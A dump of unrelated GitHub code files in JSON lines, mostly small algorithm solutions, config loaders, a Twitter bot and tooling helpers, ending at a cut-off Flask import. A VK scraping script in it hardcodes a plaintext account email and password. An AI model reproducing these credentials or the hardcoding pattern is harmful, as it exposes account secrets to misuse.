def 
updateCenters(self,rnk,data): \n        centers = []\n        for i in range(self.K):\n            r = rnk[:,i]\n            # print(r.shape,data.shape)\n            x = np.sum(data[:,0] * r) / np.sum(r)\n            y = np.sum(data[:,1] * r) / np.sum(r)\n            centers.append([int(x),int(y)])\n        return np.array(centers)\n\n    def lossCalculate(self,rnk,centers,data):\n        loss = 0\n        for i in range(self.K):\n            cx = rnk[:,i] * centers[i,0]\n            cy = rnk[:,i] * centers[i,1]\n            loss +=np.sum(np.sqrt((cx-data[:,0])**2+(cy-data[:,1])**2))  \n\n        return loss\n\n    def getLabel(self,rnk):\n        l = np.zeros([rnk.shape[0]])\n        for i in range(rnk.shape[0]):\n            l[i] = np.where(rnk[i] == 1)[0][0]\n        # print(l)\n        return l\n\n\n    def fit(self,data):\n        centers = self.createCenter(data) \n        iters = 0\n        while self.iters > iters:\n            iters += 1\n            dis = self.distance(centers,data)\n            rnk = self.getRnk(dis)\n            centers = self.updateCenters(rnk,data)\n            # loss = self.lossCalculate(rnk,centers,data)\n            # print(loss)\n        # print(centers)\n        label = self.getLabel(rnk)\n        return label","repo_name":"skye789/PA","sub_path":"B_ Exercise Worksheets a Material/code_hu/EX4/KMEANS.py","file_name":"KMEANS.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"9331588963","text":"__author__ = 'ramvibhakar'\n#https://www.hackerrank.com/contests/pythonist/challenges/python-string-formatting\n\nN = int(input())\nspace = len(bin(N)[2:]) + 1\nfor i in xrange(1, N+1):\n    d = str(i)\n    o = str(oct(i)[1:])\n    h = str(hex(i)[2:]).upper()\n    b = str(bin(i)[2:])\n    print(' '*(space-len(d)-1)+d+' '*(space-len(o))+o+' '*(space-len(h))+h+' '*(space-len(b))+b)","repo_name":"ramvibhakar/hacker_rank","sub_path":"Algorithms/Contests/Pythonist/string_formatting.py","file_name":"string_formatting.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"24796630212","text":"import os\nimport re\nimport typing\nfrom pathlib import Path\nimport pkg_resources\nimport semantic_version\nimport shutil\nimport subprocess\nfrom typing import Union, List\n\nimport et_micc2.tools.messages as messages\n\nPYBIND11_MINIMAL_VERSION = '2.6.2'\n\n\ndef on_vsc_cluster():\n    \"\"\"test if we are running on one of the VSC clusters\"\"\"\n    try:\n        os.environ['VSC_HOME']\n        os.environ['VSC_INSTITUTE_CLUSTER']\n    except:\n        return False\n    else:\n        return True\n\n\ndef is_os_tool(path_to_exe):\n    \"\"\"test if path_to_exe was installed as part of the OS.\"\"\"\n    return path_to_exe.startswith('/usr/bin')\n\n\nclass PkgInfo:\n    mock = [] # list of module names to pretend missing. This is just for testing purposes.\n\n    def __init__(self, pkg_name):\n        if pkg_name in PkgInfo.mock:\n            print(f'Mock: pretending module `{pkg_name}` is missing.')\n            self.which = ''\n        else:\n            try:\n                self.pkg_dist_info = pkg_resources.get_distribution(pkg_name)\n            except pkg_resources.DistributionNotFound:\n                self.which = ''\n            else:\n                self.which = self.pkg_dist_info.location\n\n    def is_available(self):\n        \"\"\"Return True if the tool is available, False otherwise.\"\"\"\n        return bool(self.which)\n\n    def version(self):\n        \"\"\"Return the version string of the tool, or an empty string if the tool is not available.\"\"\"\n        return self.pkg_dist_info.version if self.which else ''\n\n\nclass ToolInfo:\n    mock = [] # list of executable names to pretend missing. 
This is just for testing purposes.\n\n    def __init__(self, exe, accept_cluster_os_tools=False):\n        \"\"\"Check if tool 'exe' is available.\n\n        :param str exe: name of an executable\n        :param bool accept_cluster_os_tools: accept cluster operating system tools\n\n\n        :return: SimpleNamespace(which,version), where which is the location of the tool or an empty\n            string if it is not found or not accepted, and version is the version string (if requested)\n            as returned by 'exe --version'.\n        \"\"\"\n        self.exe = exe\n        if exe in ToolInfo.mock:\n            print(f'Mock: pretending tool `{exe}` is missing.')\n            self.which = ''\n        else:\n            # completed_which = subprocess.run(['which', exe], capture_output=True, text=True)\n            # self.which = completed_which.stdout.strip().replace('\\n', ' ')\n            self.which = shutil.which(exe)\n\n        if self.which:\n            if on_vsc_cluster() and not accept_cluster_os_tools and is_os_tool(self.which):\n                self.which = ''\n\n    def is_available(self):\n        \"\"\"Return True if the tool is available, False otherwise.\"\"\"\n        return bool(self.which)\n\n    def version(self):\n        \"\"\"Return the version string of the tool, or an empty string if the tool is not available.\"\"\"\n        # use a local variable: assigning to self.version would shadow this method on the instance\n        if self.which:\n            completed_version = subprocess.run([self.exe, '--version'], capture_output=True, text=True)\n            version = completed_version.stdout.strip().replace('\\n\\n','\\n')#.replace('\\n','\\n    ')\n        else:\n            version = ''\n        return version\n\n\ndef verify_project_name(project_name):\n    \"\"\"Project names must start with a char, and contain only chars, digits, underscores and dashes.\n\n    :returns: bool\n    \"\"\"\n    p = re.compile(r\"\\A[a-zA-Z][a-zA-Z0-9_-]*\\Z\")\n    return bool(p.match(project_name))\n\n\ndef check_pybind11(required=False):\n    pybind11 = PkgInfo('pybind11')\n    is_available = pybind11.is_available()\n    if not is_available:\n        msg = (\n            'Pybind11 is missing. C++ binary extension modules can be added, but `Pybind11` must\\n'\n            'be available to build them. \\n'\n            ' - run `pip install pybind11 [--user]`\\n'\n        )\n        if required:\n            messages.error(msg, messages.ExitCodes.MISSING_COMPONENT)\n        else:\n            messages.warning(msg)\n    else:\n        if semantic_version.Version(pybind11.version()) < semantic_version.Version(PYBIND11_MINIMAL_VERSION):\n            messages.warning(\n                f'The pybind11 version in your environment is v{pybind11.version()}, '\n                f'which is older than v{PYBIND11_MINIMAL_VERSION}.\\n'\n                f'This may cause problems. Upgrading is recommended.\\n'\n                f' - run `pip install pybind11 [--user] --upgrade`\\n'\n            )\n\n\ndef check_f2py(required=False):\n    if not ToolInfo('f2py').is_available():\n        msg = (\n            'F2py is missing. Fortran binary extension modules can be added, but `f2py` must\\n'\n            'be available to build them. F2py is part of the `numpy` Python package.\\n'\n            ' - on the cluster load a module that exposes `numpy`\\n'\n            ' - elsewhere `pip install numpy [--user]`'\n        )\n        if required:\n            messages.error(msg, messages.ExitCodes.MISSING_COMPONENT)\n        else:\n            messages.warning(msg)\n\n\ndef check_cmake(required=False):\n    if not ToolInfo('cmake').is_available():\n        msg = (\n            'CMake is missing. 
C++ binary extension modules can be added, but `cmake` must\\n'\n            'be available to build them.\\n'\n            ' - on UAntwerpen clusters: `module load buildtools`\\n'\n            ' - on other VSC clusters: `module load CMake`\\n'\n            ' - elsewhere: `pip install cmake [--user]`, or install from https://cmake.org'\n        )\n        if required:\n            messages.error(msg, messages.ExitCodes.MISSING_COMPONENT)\n        else:\n            messages.warning(msg)\n\ndef list_folders_in(dir_path: Path) -> typing.List[str]:\n    \"\"\"Get a list of all subfolders of dir_path.\"\"\"\n    lines = []\n    for entry in dir_path.iterdir():\n        if entry.is_dir():\n            lines.append(str(entry))\n    return lines\n\ndef common_path(\n        paths: List[Union[Path,str]],\n    ) -> Path:\n    \"\"\"Return the common directory (from root to leaf).\n\n    Params:\n        paths: list of paths from which the common path (left to right) is extracted.\n    \"\"\"\n    paths_resolved = [str(Path(p).resolve()) for p in paths]\n    p = Path(os.path.commonpath(paths_resolved))\n    return p","repo_name":"etijskens/et-micc2","sub_path":"et_micc2/tools/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"41984309985","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport urllib.request\nimport json\nfrom time import sleep\nfrom datetime import datetime, timedelta\nimport sys\nimport csv\nimport os\nimport vk_auth\n\napp_id = '5406915'\naccess_token = vk_auth.auth('vktool@mail.ru', 'vkpassvk', app_id, 'offline')[0]\nprint (access_token)\n\ndef get_json(url):\n\tgetjson = urllib.request.urlopen(url).read().decode('utf-8')\n\tgetjson = json.loads(getjson)\n\tsleep(0.3)\n\treturn getjson\n\npublics_list = open('../../config/config.json').read()\npublics_list = json.loads(publics_list)\n\nlogs_folder = '../../logs/' + publics_list['fail_checker_logs_folder'][0]\nlogs = os.listdir(logs_folder)\n\ncount_fails = 0\nfailed_corrections = 0\n\nfor log in logs:\n\tcurr_log = open('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/' + log)\n\tcurr_log_reader = csv.reader(curr_log)\n\tresult_before = open('../../results/csv/' + log[4:], 'r')\n\tresult_before_reader = csv.reader(result_before)\n\n\tresult_after = open(('../../results/csv/' + log[4:]).replace('.csv', '_tmp.csv'), 'w')\n\tresult_after_writer = csv.writer(result_after)\n\n\tlogs_after = open('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/tmp_' + log, 'w')\n\tlogs_after_writer = csv.writer(logs_after)\n\tlogs_after_writer.writerows([['type', 'uid']])\n\n\n\tnext(curr_log_reader)\n\n\tfailed_users = {}\n\tfor row in curr_log_reader:\n\t\tfailed_users[row[1]] = []\n\tcurr_log.seek(0)\n\tnext(curr_log_reader)\n\tfor row in curr_log_reader:\n\t\tcount_fails += 1\n\t\tfailed_users[row[1]].append(row[0])\n\n\tfor row in result_before_reader:\n\t\tif (row[1] not in failed_users):\n\t\t\tresult_after_writer.writerows([[row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13],row[14],row[15]]])\n\t\telse:\n\t\t\tprint ('Checking id' + row[1])\n\t\t\tcity = row[7]\n\t\t\tcount_original = row[9]\n\t\t\tcount_reposts = row[10]\n\t\t\tcount_likes = row[11]\n\t\t\tcount_comments = row[12]\n\t\t\tcount_unique_reposts = row[13]\n\t\t\tcount_friends = row[14]\n\t\t\tcount_followers = row[15]\n\n\t\t\tif ('city' in failed_users[row[1]]):\n\t\t\t\turl = 'https://api.vk.com/method/users.get?fields=city&user_ids=' + row[1] + '&access_token=' + access_token\n\t\t\t\ttry:\n\t\t\t\t\tuser_info = 
get_json(url)\n\t\t\t\texcept:\n\t\t\t\t\tprint ('Failed getting city__' + str(row[1]))\n\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\tlogs_after_writer.writerows([['city', str(row[1])]])\n\t\t\t\tif ('response' in user_info):\n\t\t\t\t\tcity_code = user_info['response'][0]['city']\n\t\t\t\t\tcity_info = 'https://api.vk.com/method/database.getCitiesById?access_token=' + access_token + '&city_ids=' + str(city_code)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcity_info = get_json(city_info)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\t\tprint ('failed getting city__' + str(row[1]))\n\t\t\t\t\t\tlogs_after_writer.writerows([['city', str(row[1])]])\n\t\t\t\t\tif 'response' in city_info:\n\t\t\t\t\t\tcity = city_info['response'][0]['name']\n\n\t\t\tif ('wall' in failed_users[row[1]]):\n\t\t\t\tcurr_time = datetime.now()\n\t\t\t\tdate_diff = timedelta(1)\n\t\t\t\twall_offset = 0\n\t\t\t\twall_count = 101\n\t\t\t\tcount_original = 0\n\t\t\t\tcount_reposts = 0\n\t\t\t\tcount_likes = 0\n\t\t\t\tcount_comments = 0\n\t\t\t\tcount_unique_reposts = 0\n\t\t\t\twhile (wall_offset < wall_count and date_diff.days < 366):\n\t\t\t\t\twall = 'https://api.vk.com/method/wall.get?access_token=' + access_token + '&filter=owner&offset=' + str(wall_offset) + '&count=100&owner_id=' + str(row[1])\n\t\t\t\t\ttry:\n\t\t\t\t\t\twall = get_json(wall)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint ('failed getting wall__' + str(row[1]))\n\t\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\t\tlogs_after_writer.writerows([['wall', str(row[1])]])\n\t\t\t\t\tif 'response' in wall:\n\t\t\t\t\t\twall_count = wall['response'][0]\n\t\t\t\t\t\tdel wall['response'][0]\n\t\t\t\t\t\tfor post in wall['response']:\n\t\t\t\t\t\t\tpost_date = datetime.fromtimestamp(post['date'])\n\t\t\t\t\t\t\tdate_diff = curr_time - post_date\n\t\t\t\t\t\t\tif date_diff.days < 366:\n\t\t\t\t\t\t\t\tcount_likes += post['likes']['count']\n\t\t\t\t\t\t\t\tcount_comments += post['comments']['count']\n\t\t\t\t\t\t\t\tif post['post_type'] == 'post':\n\t\t\t\t\t\t\t\t\tcount_original +=1\n\t\t\t\t\t\t\t\t\tcount_unique_reposts += post['reposts']['count']\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcount_reposts += 1\n\n\t\t\t\t\t\twall_offset += 100\n\t\t\t\t\telse:\n\t\t\t\t\t\twall_count = 0\n\n\t\t\tif ('friends' in failed_users[row[1]]):\n\t\t\t\tcount_friends = 0\n\t\t\t\tfriends_url = 'https://api.vk.com/method/friends.get?access_token=' + access_token + '&fields=name&user_id=' + str(row[1])\n\t\t\t\ttry:\n\t\t\t\t\tfriends = get_json(friends_url)\n\t\t\t\texcept:\n\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\tprint ('failed getting friends__' + str(row[1]))\n\t\t\t\t\tlogs_after_writer.writerows([['friends', str(row[1])]])\n\t\t\t\tif ('response' in friends):\n\t\t\t\t\tcount_friends = len(friends['response'])\n\t\t\t\t\tif (count_friends == 5000):\n\t\t\t\t\t\tfriends_url = 'https://api.vk.com/method/friends.get?offset=5000&access_token=' + access_token + '&fields=name&user_id=' + str(row[1])\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfriends = get_json(friends_url)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\t\t\tprint ('failed getting friends__' + str(row[1]))\n\t\t\t\t\t\t\tlogs_after_writer.writerows([['friends', str(row[1])]])\n\t\t\t\t\t\tif ('response' in friends):\n\t\t\t\t\t\t\tcount_friends += len(friends['response'])\n\n\t\t\tif ('followers' in failed_users[row[1]]):\n\t\t\t\tcount_followers = 0\n\t\t\t\tfollowers_url = 'https://api.vk.com/method/users.getFollowers?access_token=' + access_token + '&count=0&user_id=' + 
str(row[1])\n\t\t\t\ttry:\n\t\t\t\t\tfollowers = get_json(followers_url)\n\t\t\t\texcept:\n\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\tlogs_after_writer.writerows([['followers', str(row[1])]])\n\t\t\t\t\tprint ('failed getting followers__' + str(row[1]))\n\t\t\t\tif ('response' in followers):\n\t\t\t\t\tcount_followers = followers['response']['count']\n\n\t\t\tresult_after_writer.writerows([[row[0],row[1],row[2],row[3],row[4],row[5],row[6],city,row[8],count_original,count_reposts,count_likes,count_comments,count_unique_reposts,count_friends,count_followers]])\n \n\ncurr_log.close()\nresult_before.close()\nresult_after.close()\nlogs_after.close()\n\nfor log in logs:\n\tos.remove('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/' + log)\n\tos.rename('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/tmp_' + log, '../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/' + log)\n\n\tos.remove('../../results/csv/' + log[4:])\n\tos.rename(('../../results/csv/' + log[4:]).replace('.csv', '_tmp.csv'), '../../results/csv/' + log[4:])\n\nprint ('Completed. ' + str(count_fails - failed_corrections) + ' errors out of ' + str(count_fails) + ' were corrected') ","repo_name":"ryavorsky/7maps","sub_path":"scripts/fail_checkers/members_info_fail_checker.py","file_name":"members_info_fail_checker.py","file_ext":"py","file_size_in_byte":6367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"73789635891","text":"import os,yaml\n\nclass RepositoryConfig(object):\n    def __init__(self, repository=None,path=None,value=None,debug_path=None):\n        pass\n\nclass YamlConfig(object):\n    def __init__(self,filename=None,path=None,value=None,debug_path=None):\n        if debug_path:\n            self.debug_path = debug_path\n        else:\n            self.debug_path = ''\n        if filename:\n            stream = open(filename,'r',encoding='utf-8')\n            self.yaml = yaml.safe_load(stream)\n            stream.close()\n            if path:\n                self.path = path\n            else:\n                self.path = os.path.dirname(filename)\n        elif path:\n            self.path = path\n            filename = self._filename(path)\n            if filename:\n                stream = open(filename,'r',encoding='utf-8')\n                self.yaml = yaml.safe_load(stream)\n                stream.close()\n            elif os.path.isdir(self.path):\n                self.yaml = {}\n            else:\n                raise Exception('path is not found:\"%s\"' % path)\n        else:\n            if not isinstance(value,dict):\n                raise Exception('value must be dict type')\n            self.path = None\n            self.yaml = value\n    def __getattr__(self, name):\n        if name in self.yaml:\n            value = self.yaml.get(name)\n            if isinstance(value,dict):\n                value = YamlConfig(value=value,debug_path=self.debug_path+name)\n                self.yaml[name] = value\n        else:\n            if not self.path:\n                raise AttributeError('property %s does not exist in dict on \"%s\"' % (name,self.debug_path))\n            path = self.path + '/' + name\n            filename = self._filename(path)\n            if not os.path.isdir(path) and not filename:\n                raise AttributeError('property %s does not exist on path \"%s\".' 
% (name,path))\n            value = YamlConfig(path=path,debug_path=self.debug_path+name)\n            self.yaml[name] = value\n        return value\n    def _filename(self,path):\n        filename = path + '.yml'\n        if not os.path.isfile(filename):\n            filename = path + '.yaml'\n            if not os.path.isfile(filename):\n                filename = None\n        return filename\n\nclass YamlLoader(object):\n    def __init__(self,target=None,cache=None,timeout=300):\n        self.target = target\n        self.cache = cache\n        self.timeout = timeout\n        self.cache_key_prefix=self.__module__ + type(self).__name__\n\n    def load(self,target=None):\n        if target==None:\n            target = self.target\n        if self.cache:\n            key = self.cache_key_prefix + target\n            value = self.cache.get(key)\n            if value is not None:\n                return value\n        value = self._loadfiles(target)\n        if self.cache:\n            self.cache.add(key, value, self.timeout)\n        return value\n\n    def file2dict(self,filename):\n        stream = open( filename,'r',encoding='utf-8')\n        config = yaml.safe_load(stream)\n        stream.close()\n        return config\n\n    def _loadfiles(self,target):\n        config = {}\n        passfile = None\n        if os.path.isfile(target):\n            config = self.file2dict(target)\n            passfile = os.path.basename(target)\n            target = os.path.dirname(target)\n        for filename in os.listdir(target):\n            if filename == passfile:\n                continue\n            fullpath = os.path.join(target, filename)\n            if os.path.isfile(fullpath):\n                name,ext = os.path.splitext(filename)\n                if ext == '.yml' or ext == '.yaml':\n                    config[name] = self.file2dict(fullpath)\n            elif os.path.isdir(fullpath):\n                config[filename] = self._loadfiles(fullpath)\n        return config\n\nclass CollectionProxy(object):\n    def __init__(self,entity):\n        self._entity = entity\n    def __getattr__(self,name):\n        if name=='name':\n            return self._entity['name']\n        return self._entity['config'].get(name)\n    def dumpConfig(self):\n        return DictToYaml(self._entity['config'])\n    def clear(self):\n        self._entity = None\n    #if isinstance(config,unicode):\n    #    raise Exception('unicode')\n    #if isinstance(config,str):\n    #    raise Exception('str')\n\nclass DocumentProxy(object):\n    def __init__(self,entity,documentManager,routeManager):\n        self._entity = entity\n        self._collection = 'unsolved'\n        self._documentManager = documentManager\n        self._routeManager = routeManager\n        self.url = None\n    def __getattr__(self,name):\n        if name=='name':\n            return self._entity['name']\n        elif name=='content':\n            return self._entity['content']\n        elif name=='date':\n            return self._entity['date']\n\n        return self._entity['headers'].get(name)\n    def dumpHeaders(self):\n        return DictToYaml(self._entity['headers'])\n    @property\n    def collection(self):\n        \"\"\"Get collection entity\"\"\"\n        if self._collection == 'unsolved':\n            self._collection = CollectionProxy(self._entity['collection'])\n        return self._collection\n    def findDocument(self,name):\n        if name:\n            document = self._documentManager.findOne(self.collection.name,name)\n            if document:\n                return DocumentProxy(document,self._documentManager,self._routeManager)\n        return None\n    def clear(self):\n        self._entity = None\n        if isinstance(self._collection,CollectionProxy):\n            self._collection.clear()\n            self._collection = None\n    def getDocumentUrl(self,collection=None,name=None):\n        if collection==None:\n            collection = self.collection.name\n        if name==None:\n            name = self.name\n        return self._routeManager.getDocumentUrl(collection,name)\n\ndef YamlToDict(textValue):\n    return yaml.safe_load(textValue)\n\ndef DictToYaml(dictValue):\n    return yaml.safe_dump(\n        dictValue,\n        default_flow_style=False,\n        allow_unicode=True\n        
)\n","repo_name":"rindow/pyrindow-cms-pages","sub_path":"lib/pyrindow/cms/pages/model/appearance.py","file_name":"appearance.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3754750812","text":"from sys import stdin\nread = stdin.readline\n\nlst = []\nN = int(read())\n\nfor _ in range(N):\n lst.append(list(map(int, read().split())))\n\n#list안에 리스트들을 하나씩 꺼내는데 2번째 리스트부터 꺼내기 때문에 range를 1부터 설정\nfor i in range(1, N):\n for j in range(len(lst[i])):\n \n #경우의 수 3가지 존재\n #제일 첫번째에 있는 경우, 즉 index가 항상 0인 애들\n if j == 0:\n lst[i][j] += lst[i-1][j]\n \n #제일 마지막에 있는 경우, 즉 리스트의 마지막 숫자들\n elif j == len(lst[i]) - 1:\n lst[i][j] += lst[i-1][j-1]\n \n #중간에 있는 애들 두가지 index 중에 가장 큰 값을 선정\n else:\n lst[i][j] += max(lst[i-1][j-1], lst[i-1][j])\n\nprint(max(lst[N-1]))","repo_name":"KB-team3/AlgoGGang","sub_path":"김태선/Week_7/B1932_정수삼각형.py","file_name":"B1932_정수삼각형.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"942062517","text":"from random import randrange\nimport datetime \nimport copy\nimport json\n\nwith open('random_transactions_five.json') as f:\n data = json.load(f)\n\nresult = []\ncurrent = []\ni = 0\n\nfor each in data:\n if i%4 == 3:\n current = []\n for j in range(i - 3, i + 1):\n for trans in data[j]:\n if trans[\"status\"] == \"VALID\":\n trans[\"block\"] = i/4\n if trans[\"status\"] == \"UNRECORDED\":\n trans[\"block\"] = \"undefined\"\n current.append(trans)\n result.append(copy.deepcopy(current))\n current = []\n else:\n for trans in each:\n newTrans = {\"from\": trans[\"from\"], \"to\": trans[\"to\"], \"time\": trans[\"time\"], \"amount\": trans[\"amount\"], \"status\": \"UNRECORDED\", \"block\": \"undefined\"}\n current.append(newTrans)\n result.append(copy.deepcopy(current))\n i += 1\n\nwith open('data.json', 'w') as outfile:\n json.dump(result, outfile)\n","repo_name":"LTZX/BitCoin-Visualization","sub_path":"data/dataProcess-new.py","file_name":"dataProcess-new.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30124121328","text":"\"\"\"\r\n\"\"\"\r\n\r\nfrom .BaseSVG import BaseSVG\r\nfrom .__magic__ import xmlrepr, xmleval, name, check\r\n\r\nclass Container(object):\r\n \"\"\"\r\n \"\"\"\r\n\r\n __list_type__ = BaseSVG\r\n\r\n def __init__(self, elements=[]):\r\n \"\"\"\r\n Initializes.\r\n \"\"\"\r\n self.elements = elements\r\n\r\n def __xml_repr__(self, new_tag):\r\n tag = xmlrepr(super(self.__class__.__mro__[2], self).__thisclass__, self, new_tag) #assumes self.__mro__[1] == Container\r\n for element in self.elements:\r\n tag.append(xmlrepr(element, new_tag))\r\n return tag\r\n __xml_repr__.__doc__ = BaseSVG.__xml_repr__.__doc__\r\n\r\n @classmethod\r\n def __xml_eval__(cls, tag):\r\n group = xmleval(super(cls.__mro__[2], self), tag) #assumes cls.__mro__[1] == Container\r\n group.elements = [xmleval(cls.__list_type__, element) for element in tag.children]\r\n return group\r\n __xml_eval__.__doc__ = BaseSVG.__xml_eval__.__doc__\r\n\r\nclass Group(Container, BaseSVG): #favours Container\r\n \"\"\"\r\n \"\"\"\r\n\r\n __tag_name__ = 'g'\r\n __tag_attrs__ = {\r\n 'id':''\r\n }\r\n __svg_attrs__ = {}\r\n\r\n def __init__(self, id, elements=[]):\r\n \"\"\"\r\n Initializes.\r\n \"\"\"\r\n super(Container, self).__init__(elements)\r\n super(BaseSVG, 
self).__init__(id=id)\r\n\r\nclass Hyperlink(BaseSVG):\r\n \"\"\"\r\n \"\"\"\r\n\r\n __tag_name__ = 'a'\r\n __tag_attrs__ = {\r\n 'xlink:href':'',\r\n 'target':'_blank'\r\n }\r\n __svg_attrs__ = {\r\n 'url':str\r\n }\r\n __type__ = BaseSVG\r\n\r\n def __init__(self, url, wrapped):\r\n \"\"\"\r\n Initializes.\r\n \"\"\"\r\n super(BaseSVG, self).__thisclass__.__init__(self, url=url)\r\n if not isinstance(wrapped, self.__class__.__type__):\r\n raise TypeError()##\r\n self.wrapped = wrapped\r\n\r\n def __xml_repr__(self, new_tag):\r\n tag = xmlrepr(super(BaseSVG, self).__thisclass__, self, new_tag)\r\n tag.append(xmlrepr(self.wrapped, new_tag))\r\n return tag\r\n __xml_repr__.__doc__ = BaseSVG.__xml_repr__.__doc__\r\n\r\n @classmethod\r\n def __xml_eval__(cls, tag):\r\n hyper = xmleval(super(BaseSVG, self), tag)\r\n hyper.wrapped = xmleval(cls.__type__, tag.children[0])\r\n return hyper\r\n __xml_eval__.__doc__ = BaseSVG.__xml_eval__.__doc__\r\n","repo_name":"carrvo/GeomaticsTargetGenerator","sub_path":"GeomaticsTargetGenerator/SVGLibrary/Group.py","file_name":"Group.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9854296138","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ndate: 07/26/17\nauthor: stamaimer\nsource: https://leetcode.com/problems/single-number/#/description\ndifficulty: easy\n\"\"\"\n\n\nclass Solution(object):\n\n def singleNumber(self, nums):\n\n nums.sort()\n\n for num in nums[1:]:\n\n if nums[0] is None:\n\n nums[0] = num\n\n elif num == nums[0]:\n\n nums[0] = None\n\n return nums[0]\n\n\nif __name__ == '__main__':\n\n Solution().singleNumber([1, 0, 1])\n","repo_name":"stamaimer/LeetCode","sub_path":"136_single_number.py","file_name":"136_single_number.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32364076261","text":"## PYTHON MODULE IMPORTS ##\nimport os\nimport time\nfrom collections import deque\n\n## MODULE DEPENDCIES ##\nimport tweepy\nfrom dotenv import load_dotenv\n\n## FILE IMPORT ##\nfrom nepowiki import *\n\nload_dotenv()\n\n# Now you can access the variables like this\nconsumer_key = os.getenv(\"API_KEY\")\nconsumer_secret = os.getenv(\"API_SECRET\")\naccess_token = os.getenv(\"ACCESS_TOKEN\")\naccess_token_secret = os.getenv(\"ACCESS_SECRET\")\n\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n# Create API object\napi = tweepy.API(auth)\n\n\n\n# Create a queue to store the celebrities\ncelebrities = deque()\n\n# Read the celebrities list from the text file and add them to the queue\nwith open(\"celebs.txt\", \"r\") as file:\n for line in file:\n celebname = line.strip()\n celebrities.append(celebname)\n\nwhile celebrities:\n # Get the next celebrity from the front of the queue\n celebname = celebrities.popleft()\n parents = get_parents(celebname)\n if len(parents)==0:\n momdad = get_momdad(celebname)\n else:\n momdad = ''\n relatives = get_relatives(celebname)\n text = ''\n # Construct the tweet text\n if len(parents)==0 and len(momdad)==0:\n text = f\"{celebname} has 0 blue-linker parents{os.linesep}--not a nepo baby--\"\n elif len(parents)>0 and len(momdad)==0:\n text = f\"{parents}\"\n elif len(momdad)>0 and len(parents)==0:\n text = f\"{momdad}\"\n \n if relatives is not None:\n text += f\"{relatives}\"\n\n if len(text) > 280:\n text = text[:240] + \"[THIS WAS LITERALLY TOO LONG 
TO TWEET]\"\n \n\n # Post the tweet\n api.update_status(text)\n time.sleep(2*60*60) # Sleep for 1 hour\n #Delete the celebrity from the celebs.txt file\n with open(\"celebs.txt\", \"r\") as file:\n lines = file.readlines()\n with open(\"celebs.txt\", \"w\") as file:\n for line in lines:\n if line.strip() != celebname:\n file.write(line)\n\n","repo_name":"jstebbs/nepowiki","sub_path":"app/tweetmachine.py","file_name":"tweetmachine.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73877582454","text":"import sys\n\nV = int(sys.stdin.readline())\ngraph = [[] for _ in range(V+1)]\n\nfor _ in range(V):\n info = list(map(int, sys.stdin.readline().split()))\n\n for i in range(1, len(info)//2):\n graph[info[0]].append((info[2*i-1], info[2*i]))\n\nresult = [0]*(V+1)\n\n\ndef dfs(start, result):\n for node, value in graph[start]:\n if result[node] == 0:\n result[node] = result[start]+value\n dfs(node, result)\n\n\ndfs(1, result)\nstartNode = result.index(max(result))\n\nresult = [0]*(V+1)\n\ndfs(startNode, result)\nresult[startNode] = 0\n\nprint(max(result))\n","repo_name":"gangslee/Coding-Test","sub_path":"백준/210430/1167 트리의 지름.py","file_name":"1167 트리의 지름.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70927296373","text":"__author__ = \"Thomas Bell\"\n\n__version__ = (0, 2, 0)\n__version_info__ = \".\".join(map(str, __version__))\n\nAPP_NAME = \"saving-place\"\nAPP_AUTHOR = \"/u/isurvived12\"\nAPP_VERSION = __version_info__\n\nUSER_AGENT = \"desktop:{}:v{} (by {})\".format(\n APP_NAME, APP_VERSION, APP_AUTHOR)\n\n","repo_name":"bell345/saving-place","sub_path":"savingplace/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7684859647","text":"from flask import render_template, url_for, flash, redirect, request,send_from_directory, jsonify\nfrom businessify import app, db, bcrypt\nfrom businessify.forms import RegistrationForm, LoginForm\nfrom businessify.models import User, 